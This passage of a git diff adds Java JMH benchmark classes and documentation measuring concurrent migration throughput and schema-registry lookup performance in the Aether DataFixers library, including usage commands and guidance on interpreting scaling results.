+ *   <tr><th>Benchmark</th><th>Threads</th><th>Purpose</th></tr>
+ *   <tr><td>concurrentSingleFix</td><td>MAX (all available)</td><td>Maximum contention stress test</td></tr>
+ *   <tr><td>concurrentChainMigration</td><td>MAX</td><td>Chain migration under full load</td></tr>
+ *   <tr><td>fourThreadMigration</td><td>4</td><td>Typical server scenario baseline</td></tr>
+ *   <tr><td>eightThreadMigration</td><td>8</td><td>Higher parallelism scaling point</td></tr>
+ *   <tr><td>concurrentRegistryLookup</td><td>MAX</td><td>Registry contention stress test</td></tr>
+ *   <tr><td>concurrentLatestLookup</td><td>MAX</td><td>Hot path contention analysis</td></tr>
+ * </table>

+ * <h2>Parameters</h2>
+ *
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM</td><td>Input data complexity per thread</td></tr>
+ * </table>

+ * <h2>Benchmark Configuration</h2>
+ *
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>3 iterations, 2 seconds each</td></tr>
+ *   <tr><td>Measurement</td><td>5 iterations, 2 seconds each</td></tr>
+ *   <tr><td>Forks</td><td>2 (for JIT variance mitigation)</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>

+ * <h2>State Management</h2>
+ *
+ * <p>This benchmark uses two JMH state classes to properly isolate shared and
+ * thread-local data:</p>
+ *
+ * <ul>
+ *   <li>{@link BenchmarkState} (Scope.Benchmark) - Shared across all threads: DataFixer
+ *       instances, SchemaRegistry, and version constants</li>
+ *   <li>{@link ThreadState} (Scope.Thread) - Per-thread isolation: input data, RNG,
+ *       and pre-computed random indices to avoid contention</li>
+ * </ul>

+ * <h2>Interpreting Results</h2>
+ *
+ * <ul>
+ *   <li><b>Linear throughput scaling:</b> Ideal - throughput increases proportionally with thread count</li>
+ *   <li><b>Sub-linear scaling:</b> Expected due to shared resource contention (cache lines, locks)</li>
+ *   <li><b>Throughput plateau:</b> Indicates saturation point; adding threads provides no benefit</li>
+ *   <li><b>Throughput degradation:</b> Severe contention; may indicate lock contention or false sharing</li>
+ *   <li><b>High variance (±):</b> May indicate GC pauses, lock contention, or scheduler interference</li>
+ * </ul>

+ * <h2>Usage</h2>
+ *
+ * <pre>{@code
+ * # Run all concurrent benchmarks
+ * java -jar benchmarks.jar ".*concurrent.*"
+ *
+ * # Run with specific thread count override
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -t 16
+ *
+ * # Run registry-only benchmarks
+ * java -jar benchmarks.jar ".*concurrent.*Lookup.*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate JSON report for analysis
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -rf json -rff concurrent_results.json
+ *
+ * # Profile with async-profiler integration
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -prof async:output=flamegraph
+ * }</pre>
+ * + * @author Erik Pförtner + * @see de.splatgames.aether.datafixers.benchmarks.core.SingleFixBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.core.MultiFixChainBenchmark + * @see BenchmarkBootstrap + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class ConcurrentMigrationBenchmark { + + // ==================== Concurrent Migration Benchmarks ==================== + + /** + * Benchmarks concurrent single-fix migrations with maximum thread parallelism. + * + *

+ * <p>All available CPU threads simultaneously apply a single DataFix to their
+ * respective input data. This benchmark stress-tests the thread-safety of the
+ * DataFixer implementation and measures maximum achievable throughput.</p>
+ *
+ * <p>Key aspects measured:</p>
+ *
+ * <ul>
+ *   <li>Lock contention in the shared DataFixer instance</li>
+ *   <li>Memory allocation pressure under concurrent load</li>
+ *   <li>Cache coherency effects from shared schema access</li>
+ * </ul>
+ * + * @param s shared benchmark state containing the DataFixer and versions + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentSingleFix(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks concurrent chain migrations with maximum thread parallelism. + * + *

+ * <p>All available CPU threads simultaneously apply a 10-fix chain migration.
+ * This benchmark combines the stress of concurrent access with the complexity
+ * of multi-step migrations, revealing performance characteristics under
+ * realistic high-load scenarios.</p>
+ *
+ * <p>Compared to {@link #concurrentSingleFix}, this benchmark:</p>
+ *
+ * <ul>
+ *   <li>Increases per-operation duration, potentially reducing contention</li>
+ *   <li>Exercises fix ordering and version traversal logic concurrently</li>
+ *   <li>Creates higher memory allocation rates per thread</li>
+ * </ul>
+ * + * @param s shared benchmark state containing the chain DataFixer + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentChainMigration(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedChainFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.chainToVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks migration performance with exactly 4 concurrent threads. + * + *

+ * <p>Provides a fixed-thread baseline for comparing against variable-thread
+ * benchmarks. Four threads represent a typical server core count and help
+ * establish scaling characteristics between single-threaded and maximum
+ * parallelism scenarios.</p>
+ *
+ * <p>Use this benchmark to:</p>
+ *
+ * <ul>
+ *   <li>Establish baseline concurrent performance on quad-core systems</li>
+ *   <li>Compare with {@link #eightThreadMigration} to measure the scaling factor</li>
+ *   <li>Identify the point where adding threads provides diminishing returns</li>
+ * </ul>
+ * + * @param s shared benchmark state containing the DataFixer + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(4) + public void fourThreadMigration(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks migration performance with exactly 8 concurrent threads. + * + *

+ * <p>Tests scaling beyond the 4-thread baseline. Eight threads represent
+ * a common server configuration and help identify whether the DataFixer
+ * implementation scales efficiently with additional parallelism.</p>
+ *
+ * <p>Scaling analysis:</p>
+ *
+ * <ul>
+ *   <li><b>2x throughput vs 4 threads:</b> Perfect linear scaling</li>
+ *   <li><b>1.5-2x throughput:</b> Good scaling with minor contention</li>
+ *   <li><b>&lt;1.5x throughput:</b> Contention limiting scalability</li>
+ *   <li><b>≤1x throughput:</b> Severe contention; investigate locking</li>
+ * </ul>
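+ *
+ * <p>For example, if {@link #fourThreadMigration} sustains 4.0 ops/us and this
+ * benchmark sustains 6.4 ops/us on the same payload, the scaling factor is
+ * 6.4 / 4.0 = 1.6x, which falls into the "good scaling with minor contention"
+ * band above.</p>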
+ * + * @param s shared benchmark state containing the DataFixer + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(8) + public void eightThreadMigration(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.toVersion + ); + blackhole.consume(result); + } + + // ==================== Concurrent Registry Access Benchmarks ==================== + + /** + * Benchmarks concurrent random schema lookups from the registry. + * + *

+ * <p>All available threads perform random version lookups against a shared
+ * {@link SchemaRegistry} containing 100 schema versions. This benchmark
+ * validates the thread-safety and performance of registry read operations
+ * under heavy concurrent access.</p>
+ *
+ * <p>The benchmark uses pre-computed random indices (via {@link ThreadState#nextRegistryIndex()})
+ * to avoid RNG contention affecting measurements. Each thread cycles through
+ * a 1024-element buffer of random indices.</p>
+ *
+ * <p>Performance expectations:</p>
+ *
+ * <ul>
+ *   <li>Registry lookups should be lock-free and scale linearly</li>
+ *   <li>Cache effects may cause variance based on version access patterns</li>
+ *   <li>No write contention, since the registry is frozen before benchmarking</li>
+ * </ul>
+ * + * @param s shared benchmark state containing the registry and versions + * @param t per-thread state providing random index sequence + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentRegistryLookup(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final int index = t.nextRegistryIndex(); + final Schema schema = s.sharedRegistry.get(s.registryVersions[index]); + blackhole.consume(schema); + } + + /** + * Benchmarks concurrent latest-schema lookups from the registry. + * + *

+ * <p>All available threads repeatedly call {@link SchemaRegistry#latest()}
+ * on a shared registry. This represents the "hot path" optimization where
+ * applications frequently need the most recent schema version.</p>
+ *
+ * <p>This benchmark helps validate:</p>
+ *
+ * <ul>
+ *   <li>Caching effectiveness for the latest schema reference</li>
+ *   <li>Memory visibility of the cached latest schema across threads</li>
+ *   <li>Absence of unnecessary synchronization on read-only access</li>
+ * </ul>
+ *
+ * <p>Expected to outperform {@link #concurrentRegistryLookup} due to:</p>
+ *
+ * <ul>
+ *   <li>No version-to-schema map lookup being required</li>
+ *   <li>A single cached reference rather than a computed lookup</li>
+ *   <li>Better CPU cache utilization from accessing the same memory location</li>
+ * </ul>
+ * + * @param s shared benchmark state containing the registry + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentLatestLookup(final BenchmarkState s, + final Blackhole blackhole) { + final Schema schema = s.sharedRegistry.latest(); + blackhole.consume(schema); + } + + // ==================== State Classes ==================== + + /** + * Shared benchmark state accessible by all threads. + * + *

+ * <p>This state class contains all resources that are shared across benchmark
+ * threads, simulating real-world scenarios where a single DataFixer instance
+ * serves multiple concurrent requests.</p>
+ *
+ * <p>State initialization occurs once per trial (before warmup begins) to
+ * ensure consistent starting conditions across all measurement iterations.</p>
+ *
+ * <h3>Shared Resources</h3>
+ *
+ * <ul>
+ *   <li>{@link #sharedFixer} - Single-fix DataFixer for basic migration benchmarks</li>
+ *   <li>{@link #sharedChainFixer} - 10-fix chain DataFixer for chain migration benchmarks</li>
+ *   <li>{@link #sharedRegistry} - Frozen SchemaRegistry with 100 versions for lookup benchmarks</li>
+ *   <li>Version constants - Pre-computed DataVersion instances to avoid allocation during measurement</li>
+ * </ul>
+ */ + @State(Scope.Benchmark) + public static class BenchmarkState { + + /** + * The payload size parameter, injected by JMH. + * + *

+ * <p>Controls the complexity of generated test data for each thread.
+ * Only SMALL and MEDIUM sizes are used to balance benchmark runtime
+ * with meaningful performance differentiation.</p>

+ * + * @see PayloadSize + */ + @Param({"SMALL", "MEDIUM"}) + public PayloadSize payloadSize; + + /** + * Shared DataFixer configured with a single fix (v1 → v2). + * + *

+ * <p>Used by migration benchmarks that measure basic concurrent
+ * fix application without chain traversal overhead.</p>

+ */ + public DataFixer sharedFixer; + + /** + * Shared DataFixer configured with a 10-fix chain (v1 → v11). + * + *

+ * <p>Used by {@link #concurrentChainMigration} to measure concurrent
+ * performance when applying multiple sequential fixes.</p>

+ */ + public DataFixer sharedChainFixer; + + /** + * Shared SchemaRegistry containing 100 schema versions. + * + *

+ * <p>The registry is frozen after population to ensure thread-safe
+ * read access during benchmarks. Versions range from 10 to 1000
+ * in increments of 10.</p>

+ */ + public SchemaRegistry sharedRegistry; + + /** + * Source version for all migrations (v1). + */ + public DataVersion fromVersion; + + /** + * Target version for single-fix migrations (v2). + */ + public DataVersion toVersion; + + /** + * Target version for chain migrations (v11). + */ + public DataVersion chainToVersion; + + /** + * Pre-computed DataVersion array for registry lookup benchmarks. + * + *

+ * <p>Contains 100 versions (10, 20, 30, ..., 1000) matching the
+ * schemas registered in {@link #sharedRegistry}. Pre-allocation
+ * avoids DataVersion object creation during measurement.</p>

+ */ + public DataVersion[] registryVersions; + + /** + * Initializes all shared benchmark state. + * + *

+ * <p>Creates DataFixer instances, populates the SchemaRegistry with
+ * 100 versions, and pre-computes all version constants. The registry
+ * is frozen after population to enable lock-free concurrent reads.</p>

+ */ + @Setup(Level.Trial) + public void setup() { + this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer(); + this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10); + + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + this.chainToVersion = new DataVersion(11); + + final SimpleSchemaRegistry registry = new SimpleSchemaRegistry(); + this.registryVersions = new DataVersion[100]; + for (int i = 0; i < 100; i++) { + final int version = (i + 1) * 10; + this.registryVersions[i] = new DataVersion(version); + registry.register(MockSchemas.minimal(version)); + } + registry.freeze(); + this.sharedRegistry = registry; + } + } + + /** + * Per-thread benchmark state for isolated data and random access patterns. + * + *

+ * <p>This state class provides each benchmark thread with its own input data
+ * and random number generator to eliminate false sharing and contention on
+ * thread-local operations.</p>

+ * + *

+ * <h3>Design Rationale</h3>
+ *
+ * <ul>
+ *   <li><b>Thread-local input:</b> Each thread operates on its own Dynamic instance,
+ *       preventing write contention and ensuring independent GC behavior</li>
+ *   <li><b>SplittableRandom:</b> Faster and contention-free compared to
+ *       {@link java.util.Random}, which uses atomic CAS operations</li>
+ *   <li><b>Pre-computed indices:</b> Random registry indices are generated during
+ *       setup to avoid RNG overhead during measurement</li>
+ * </ul>
+ *
+ * <h3>Index Buffer Strategy</h3>
+ *
+ * <p>The {@link #registryIndexBuffer} uses a power-of-two size (1024) with
+ * bitwise AND masking for efficient wraparound without modulo operations.
+ * This provides pseudo-random access patterns while minimizing measurement
+ * overhead.</p>
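+ *
+ * <p>The masking trick relies on the buffer size being a power of two; for such
+ * sizes {@code cursor & (size - 1)} is equivalent to {@code cursor % size} for
+ * non-negative cursors, as this self-contained check illustrates:</p>
+ *
+ * <pre>{@code
+ * int size = 1024;      // power of two, matching INDEX_BUFFER_SIZE
+ * int mask = size - 1;  // 1023: the ten low bits set
+ * for (int cursor = 0; cursor < 5_000; cursor++) {
+ *     assert (cursor & mask) == (cursor % size);
+ * }
+ * }</pre>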

+ */ + @State(Scope.Thread) + public static class ThreadState { + + /** + * Size of the pre-computed random index buffer. + * + *

+ * <p>Power of two (1024) enables efficient wraparound via bitwise AND.
+ * Large enough to avoid pattern repetition affecting cache behavior
+ * during typical measurement windows.</p>

+ */ + private static final int INDEX_BUFFER_SIZE = 1024; + + /** + * Bitmask for efficient modulo operation on buffer index. + * + *

+ * <p>Used as {@code cursor & INDEX_MASK} instead of {@code cursor % INDEX_BUFFER_SIZE}
+ * for faster wraparound calculation.</p>

+ */ + private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1; + + /** + * Pre-computed random indices for registry lookup benchmarks. + * + *

+ * <p>Populated during iteration setup with random values in range
+ * [0, registryVersions.length). Accessed via {@link #nextRegistryIndex()}.</p>

+ */ + private final int[] registryIndexBuffer = new int[INDEX_BUFFER_SIZE]; + + /** + * Per-thread input data for migration benchmarks. + * + *

+ * <p>Regenerated at each iteration to ensure consistent memory allocation
+ * patterns and prevent cross-iteration caching effects.</p>

+ */ + public Dynamic threadInput; + + /** + * Current position in the {@link #registryIndexBuffer}. + * + *

+ * <p>Incremented on each call to {@link #nextRegistryIndex()} and
+ * wrapped using {@link #INDEX_MASK}.</p>

+ */ + private int registryCursor; + + /** + * Per-thread random number generator. + * + *

+ * <p>{@link SplittableRandom} is used instead of {@link java.util.Random}
+ * because it is faster and does not use atomic operations, eliminating
+ * contention when multiple threads generate random numbers.</p>

+ */ + private SplittableRandom random; + + /** + * Initializes the per-thread random number generator. + * + *

+ * <p>Called once per trial. Uses a fixed seed (42) for reproducibility
+ * across benchmark runs, though each thread will produce different
+ * sequences due to {@link SplittableRandom}'s splittable nature.</p>

+ */ + @Setup(Level.Trial) + public void setupTrial() { + // Per-thread RNG avoids contention and is faster than java.util.Random. + this.random = new SplittableRandom(42L); + } + + /** + * Regenerates input data and random indices for each iteration. + * + *

+ * <p>Fresh data generation per iteration ensures:</p>
+ *
+ * <ul>
+ *   <li>Consistent GC pressure across iterations</li>
+ *   <li>No JIT over-optimization on specific data patterns</li>
+ *   <li>Independent memory allocation per thread</li>
+ * </ul>
+ *
+ * <p>The random index buffer is refilled with new random values to
+ * vary the registry access pattern across iterations.</p>

+ * + * @param s the shared benchmark state providing payload size and version array + */ + @Setup(Level.Iteration) + public void setupIteration(final BenchmarkState s) { + this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, s.payloadSize); + + for (int i = 0; i < INDEX_BUFFER_SIZE; i++) { + this.registryIndexBuffer[i] = this.random.nextInt(s.registryVersions.length); + } + this.registryCursor = 0; + } + + /** + * Returns the next pre-computed random index for registry lookups. + * + *

+ * <p>Retrieves the next value from {@link #registryIndexBuffer} and
+ * advances the cursor with efficient bitwise wraparound. This method
+ * is called during measurement and is optimized to minimize overhead.</p>

+ * + * @return a random index in range [0, registryVersions.length) + */ + public int nextRegistryIndex() { + return this.registryIndexBuffer[this.registryCursor++ & INDEX_MASK]; + } + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java new file mode 100644 index 0000000..9b374ee --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java @@ -0,0 +1,130 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Concurrency-focused JMH benchmarks for the Aether DataFixers framework. + * + *

+ * <p>This package contains benchmarks that measure performance characteristics under
+ * concurrent load. These benchmarks validate thread-safety of the DataFixer system,
+ * identify contention points, and quantify scalability across different thread counts.</p>

+ *
+ * <h2>Benchmark Classes</h2>
+ *
+ * <table>
+ *   <tr><th>Class</th><th>Focus Area</th><th>Key Metrics</th></tr>
+ *   <tr>
+ *     <td>{@link de.splatgames.aether.datafixers.benchmarks.concurrent.ConcurrentMigrationBenchmark}</td>
+ *     <td>Multi-threaded migration and registry access</td>
+ *     <td>Throughput scaling, contention overhead, thread-safety validation</td>
+ *   </tr>
+ * </table>

+ * <h2>Why Concurrent Benchmarks?</h2>
+ *
+ * <p>Single-threaded benchmarks measure raw operation performance, but real-world
+ * applications often use the DataFixer system from multiple threads simultaneously.
+ * Concurrent benchmarks reveal:</p>
+ *
+ * <ul>
+ *   <li><b>Lock contention:</b> Synchronization overhead in shared components</li>
+ *   <li><b>Cache coherency effects:</b> Performance impact of shared data access</li>
+ *   <li><b>Scalability limits:</b> Point at which adding threads stops improving throughput</li>
+ *   <li><b>Thread-safety validation:</b> Correctness under concurrent access</li>
+ * </ul>

+ * <h2>Running Concurrent Benchmarks</h2>
+ *
+ * <pre>{@code
+ * # Run all concurrent benchmarks with maximum threads
+ * java -jar benchmarks.jar ".*concurrent.*"
+ *
+ * # Run with specific thread count
+ * java -jar benchmarks.jar ".*concurrent.*" -t 8
+ *
+ * # Quick validation with reduced iterations
+ * java -jar benchmarks.jar ".*concurrent.*" -wi 1 -i 1 -f 1
+ *
+ * # Generate detailed JSON report
+ * java -jar benchmarks.jar ".*concurrent.*" -rf json -rff concurrent_results.json
+ *
+ * # Profile lock contention with JFR
+ * java -jar benchmarks.jar ".*concurrent.*" -prof jfr
+ * }</pre>
+ *
+ * <h2>Benchmark Design Principles</h2>
+ *
+ * <ul>
+ *   <li><b>State Isolation:</b> Per-thread state ({@code Scope.Thread}) for input data
+ *       prevents false sharing and measurement interference (sketched below)</li>
+ *   <li><b>Shared Resources:</b> Benchmark-scoped state ({@code Scope.Benchmark}) for
+ *       DataFixer instances simulates realistic concurrent access patterns</li>
+ *   <li><b>Contention-Free Setup:</b> Random number generation and data preparation
+ *       occur during setup phases to avoid affecting measurements</li>
+ *   <li><b>Fixed Thread Counts:</b> Benchmarks with 4 and 8 threads provide
+ *       reproducible scaling data points for comparison</li>
+ * </ul>
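+ *
+ * <p>The first two principles reduce to the standard JMH state-scope pattern,
+ * shown here in miniature (class and field names are illustrative only):</p>
+ *
+ * <pre>{@code
+ * @State(Scope.Benchmark)              // one instance shared by all threads
+ * public static class Shared {
+ *     DataFixer fixer;                 // simulates one fixer serving many requests
+ * }
+ *
+ * @State(Scope.Thread)                 // one instance per benchmark thread
+ * public static class PerThread {
+ *     Dynamic<JsonElement> input;      // isolated input, no false sharing
+ * }
+ * }</pre>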

+ * <h2>Interpreting Concurrent Results</h2>
+ *
+ * <p>Concurrent benchmark results require careful interpretation:</p>
+ *
+ * <table>
+ *   <tr><th>Pattern</th><th>Meaning</th><th>Action</th></tr>
+ *   <tr><td>Linear throughput scaling</td><td>No contention; excellent parallelism</td><td>None needed</td></tr>
+ *   <tr><td>Sub-linear scaling</td><td>Some contention; typical for shared resources</td><td>Acceptable; monitor for degradation</td></tr>
+ *   <tr><td>Throughput plateau</td><td>Saturation point reached</td><td>Identify bottleneck (CPU, memory, locks)</td></tr>
+ *   <tr><td>Throughput degradation</td><td>Severe contention; adding threads hurts</td><td>Investigate locking; consider lock-free alternatives</td></tr>
+ *   <tr><td>High variance (± error)</td><td>GC pauses, lock contention, or scheduling</td><td>Profile with async-profiler or JFR</td></tr>
+ * </table>

+ * <h2>Comparison with Core Benchmarks</h2>
+ *
+ * <p>The {@link de.splatgames.aether.datafixers.benchmarks.core core} package
+ * measures single-threaded baseline performance. Use concurrent benchmarks to:</p>
+ *
+ * <ul>
+ *   <li><b>Calculate concurrency overhead:</b> {@code (single-threaded throughput × N threads) / actual throughput}</li>
+ *   <li><b>Identify scaling efficiency:</b> {@code actual throughput / (single-threaded throughput × N threads)}
+ *       (see the worked example below)</li>
+ *   <li><b>Detect regression:</b> Compare concurrent results across code changes</li>
+ * </ul>
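+ *
+ * <p>A worked example of the scaling-efficiency formula, with illustrative
+ * numbers only:</p>
+ *
+ * <pre>{@code
+ * double singleThreadOpsPerUs = 2.0;  // from a single-threaded core benchmark
+ * int threads = 8;
+ * double concurrentOpsPerUs = 10.0;   // from a concurrent benchmark run at -t 8
+ *
+ * double efficiency = concurrentOpsPerUs / (singleThreadOpsPerUs * threads);
+ * // 10.0 / 16.0 = 0.625 -> 62.5% of ideal linear scaling (sub-linear but typical)
+ * }</pre>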
+ * + * @see de.splatgames.aether.datafixers.benchmarks.concurrent.ConcurrentMigrationBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.core + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.concurrent; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java new file mode 100644 index 0000000..2b3e535 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java @@ -0,0 +1,307 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.core; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for chained DataFix application performance. + * + *

+ * <p>Measures how fix chain length affects migration performance. This benchmark
+ * is essential for understanding the scalability characteristics of the DataFixer
+ * system when applying multiple sequential fixes.</p>

+ *
+ * <h2>Benchmark Methods</h2>
+ *
+ * <ul>
+ *   <li>{@link #renameChain} - Chain of homogeneous field rename operations</li>
+ *   <li>{@link #mixedChain} - Chain of heterogeneous operations (renames, additions, transformations)</li>
+ *   <li>{@link #partialChain} - Partial chain execution stopping at the halfway version</li>
+ * </ul>

+ * <h2>Parameters</h2>
+ *
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>fixCount</td><td>1, 5, 10, 25, 50</td><td>Number of fixes in the chain</td></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM</td><td>Input data complexity</td></tr>
+ * </table>

+ * <h2>Benchmark Configuration</h2>
+ *
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2 (for statistical significance)</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>

+ * <h2>Interpreting Results</h2>
+ *
+ * <ul>
+ *   <li><b>Linear scaling:</b> Ideal behavior where time scales proportionally with fix count
+ *       (see the worked example below)</li>
+ *   <li><b>Sub-linear scaling:</b> Better than expected; indicates optimization opportunities being exploited</li>
+ *   <li><b>Super-linear scaling:</b> Indicates potential performance issues with long chains</li>
+ *   <li><b>Error (±):</b> 99.9% confidence interval; larger values with more fixes may indicate GC pressure</li>
+ * </ul>
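+ *
+ * <p>For example, under perfectly linear scaling a {@code fixCount = 50} chain
+ * should take roughly 50x the measured {@code fixCount = 1} time; a markedly
+ * higher ratio points at overhead in the chain traversal itself.</p>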

+ * <h2>Usage</h2>
+ *
+ * <pre>{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar MultiFixChainBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar MultiFixChainBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific fix count and payload size
+ * java -jar benchmarks.jar MultiFixChainBenchmark -p fixCount=10 -p payloadSize=SMALL
+ *
+ * # Generate CSV output for analysis
+ * java -jar benchmarks.jar MultiFixChainBenchmark -rf csv -rff chain_results.csv
+ * }</pre>
